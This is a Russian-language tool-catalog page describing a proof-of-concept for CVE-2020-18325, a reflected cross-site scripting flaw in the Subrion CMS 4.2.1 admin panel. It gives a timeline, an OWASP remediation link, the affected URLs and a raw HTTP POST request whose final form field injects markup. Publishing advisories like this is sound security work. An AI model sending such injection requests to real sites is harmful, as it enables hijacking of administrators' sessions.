Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-18325 — Эксплойт PoC для CVE-2020-18325 | Kitploit
Инструменты/GitHubGitHub/hamm0nz/cve-2020-18325
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

Эксплойт PoC для CVE-2020-18325

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Множественная уязвимость межсайтового скриптинга (XSS) существует в панели конфигурации Intelliants Subrion CMS v4.2.1.

Описание

Subrion CMS легко устанавливается и прост в управлении. Используйте его как отдельное приложение или в сочетании с другими приложениями для создания сайтов начального, среднего или крупного размера.

В панели конфигурации Subrion CMS v.4.2.1 были обнаружены множественные отражённые уязвимости межсайтового скриптинга, позволяющие удалённому злоумышленнику внедрить произвольный JavaScript.

Дата: 27-02-2022
Ссылка на ПО: https://subrion.org
Автор эксплойта: HaMM0nz
CVE: CVE-2020-18325
Категория: Веб-приложение
Затронутые URL

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

Подтверждение концепции

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1

-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

Хронология

Обнаружение и отчет : 24 June 2019
Назначен идентификатор CVE : 11 Aug 2021
Публикация : 27 February 2022

Решение

Рекомендуется следовать рекомендациям OWASP по предотвращению XSS. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

Скачать инструмент